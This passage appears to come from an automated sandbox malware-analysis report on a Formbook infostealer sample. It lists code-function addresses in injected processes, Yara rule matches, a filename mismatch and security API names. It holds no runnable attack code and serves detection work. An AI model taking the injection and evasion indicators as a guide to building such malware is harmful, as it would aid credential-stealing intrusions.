Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01109C32	8_2_01109C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01130CB5	8_2_01130CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01080CF2	8_2_01080CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114FF09	8_2_0114FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010D2F28	8_2_010D2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010B0F30	8_2_010B0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01104F40	8_2_01104F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01091F92	8_2_01091F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114FFB1	8_2_0114FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01082FC8	8_2_01082FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0109CFE0	8_2_0109CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114EE26	8_2_0114EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01090E59	8_2_01090E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114CE93	8_2_0114CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_010A2E90	8_2_010A2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_01099EB0	8_2_01099EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0114EEDB	8_2_0114EEDB
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D48A4A	10_2_02D48A4A
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D51075	10_2_02D51075
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D5107A	10_2_02D5107A
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D4A9CA	10_2_02D4A9CA
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D489F2	10_2_02D489F2
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D67FDA	10_2_02D67FDA
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 10_2_02D4A7AA	10_2_02D4A7AA
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EA352	11_2_037EA352
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0371D34C	11_2_0371D34C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E132D	11_2_037E132D
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0373E3F0	11_2_0373E3F0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037F03E6	11_2_037F03E6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0377739A	11_2_0377739A
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037D0274	11_2_037D0274
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037D12ED	11_2_037D12ED
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0374B2C0	11_2_0374B2C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037352A0	11_2_037352A0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0371F172	11_2_0371F172
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037FB16B	11_2_037FB16B
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0376516C	11_2_0376516C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037B8158	11_2_037B8158
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037CA118	11_2_037CA118
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03720100	11_2_03720100
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E81CC	11_2_037E81CC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0373B1B0	11_2_0373B1B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037F01AA	11_2_037F01AA
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E70E9	11_2_037E70E9
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EF0E0	11_2_037EF0E0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037DF0CC	11_2_037DF0CC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037370C0	11_2_037370C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03730770	11_2_03730770
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03754750	11_2_03754750
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037217EC	11_2_037217EC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0372C7C0	11_2_0372C7C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EF7B0	11_2_037EF7B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0374C6E0	11_2_0374C6E0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E16CC	11_2_037E16CC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E7571	11_2_037E7571
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03730535	11_2_03730535
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037CD5B0	11_2_037CD5B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037F0591	11_2_037F0591
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03721460	11_2_03721460
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E2446	11_2_037E2446
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EF43F	11_2_037EF43F
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037DE4F6	11_2_037DE4F6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EFB76	11_2_037EFB76
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037A5BF0	11_2_037A5BF0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0376DBF9	11_2_0376DBF9
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E6BD7	11_2_037E6BD7
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0374FB80	11_2_0374FB80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037A3A6C	11_2_037A3A6C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EFA49	11_2_037EFA49
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E7A46	11_2_037E7A46
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037DDAC6	11_2_037DDAC6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037CDAAC	11_2_037CDAAC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03775AA0	11_2_03775AA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0372EA80	11_2_0372EA80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03746962	11_2_03746962
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03739950	11_2_03739950
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0374B950	11_2_0374B950
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037329A0	11_2_037329A0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037FA9A6	11_2_037FA9A6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0373A840	11_2_0373A840
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0379D800	11_2_0379D800
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0375E8F0	11_2_0375E8F0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037338E0	11_2_037338E0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037168B8	11_2_037168B8
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037A4F40	11_2_037A4F40
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03750F30	11_2_03750F30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03772F28	11_2_03772F28
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EFF09	11_2_037EFF09
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0373CFE0	11_2_0373CFE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03722FC8	11_2_03722FC8
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EFFB1	11_2_037EFFB1
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03731F92	11_2_03731F92
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03730E59	11_2_03730E59
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EEE26	11_2_037EEE26
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037EEEDB	11_2_037EEEDB
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03739EB0	11_2_03739EB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03742E90	11_2_03742E90
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037ECE93	11_2_037ECE93
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E7D73	11_2_037E7D73
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037E1D5A	11_2_037E1D5A
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03733D40	11_2_03733D40
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0373AD00	11_2_0373AD00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0372ADE0	11_2_0372ADE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0374FDC0	11_2_0374FDC0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03748DBF	11_2_03748DBF
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037A9C32	11_2_037A9C32
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03730C00	11_2_03730C00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_03720CF2	11_2_03720CF2
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_037D0CB5	11_2_037D0CB5
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_030116D0	11_2_030116D0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0302A120	11_2_0302A120
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_030131BB	11_2_030131BB
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_030131C0	11_2_030131C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0300CB10	11_2_0300CB10
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0300AB90	11_2_0300AB90
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_0300C8F0	11_2_0300C8F0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035CB208	11_2_035CB208
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035CC1A8	11_2_035CC1A8
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035CA45B	11_2_035CA45B
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035CA4BF	11_2_035CA4BF
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035CA4BA	11_2_035CA4BA
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035CBE06	11_2_035CBE06
Source: C:\Windows\SysWOW64\convert.exe	Code function: 11_2_035CBCE8	11_2_035CBCE8
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 13_2_04B5CC25	13_2_04B5CC25
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 13_2_04B63765	13_2_04B63765
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 13_2_04B7C1B5	13_2_04B7C1B5
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 13_2_04B5E985	13_2_04B5E985
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 13_2_04B65255	13_2_04B65255
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 13_2_04B65250	13_2_04B65250
Source: C:\Program Files (x86)\UzVmIKqKKKIUmlFTdhEWXdmgJvPkFwXWaHzHndjHm\nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe	Code function: 13_2_04B5EBA5	13_2_04B5EBA5

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0110F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 010C5130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 010FEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 0107B970 appears 271 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 010D7E54 appears 94 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 03765130 appears 36 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 0371B970 appears 271 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 0379EA12 appears 86 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 03777E54 appears 94 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 037AF290 appears 105 times

Sample file is different than original file name gathered from version info

Source: 9B1ZyhsFUq.exe, 00000000.00000002.1293384927.0000000003170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamegh2q.dll4 vs 9B1ZyhsFUq.exe
Source: 9B1ZyhsFUq.exe, 00000000.00000002.1293384927.00000000030E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamegh2q.dll4 vs 9B1ZyhsFUq.exe
Source: 9B1ZyhsFUq.exe, 00000000.00000002.1293336090.0000000003050000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamegh2q.dll4 vs 9B1ZyhsFUq.exe

Yara signature match

Source: 8.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2510828363.0000000003490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2511150880.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1718728235.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2514005145.0000000004B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2511734238.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1719734977.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.2507357449.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1719850737.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, TaskParameter.cs	Task registration methods: 'CreateNewTaskItemFrom'
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, OutOfProcTaskHostNode.cs	Task registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, TaskLoader.cs	Task registration methods: 'CreateTask'
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, RegisteredTaskObjectCacheBase.cs	Task registration methods: 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'

Source: 13.0.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
Source: 13.0.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
Source: 13.0.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.convert.exe.32a3d08.0.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.convert.exe.32a3d08.0.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
Source: 11.2.convert.exe.3d1cd08.3.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.convert.exe.32a3d08.0.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
Source: 11.2.convert.exe.32a3d08.0.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
Source: 11.2.convert.exe.32a3d08.0.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 17.2.firefox.exe.302ccd08.0.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.2.firefox.exe.302ccd08.0.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 17.2.firefox.exe.302ccd08.0.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
Source: 17.2.firefox.exe.302ccd08.0.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
Source: 17.2.firefox.exe.302ccd08.0.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 13.0.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 13.0.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 13.2.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 13.2.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, CommunicationsUtilities.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 13.2.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
Source: 13.2.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
Source: 13.2.nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe.26dcd08.1.raw.unpack, NodeEndpointOutOfProcBase.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: convert.exe, 0000000B.00000002.2508578824.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.2512955277.0000000003D1C000.00000004.10000000.00040000.00000000.sdmp, nBalytGzlKEsLGhTwrqyRTGQJtkGfn.exe, 0000000D.00000002.2512550454.00000000026DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2013938447.00000000302CC000.00000004.80000000.00040000.00000000.sdmp	Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
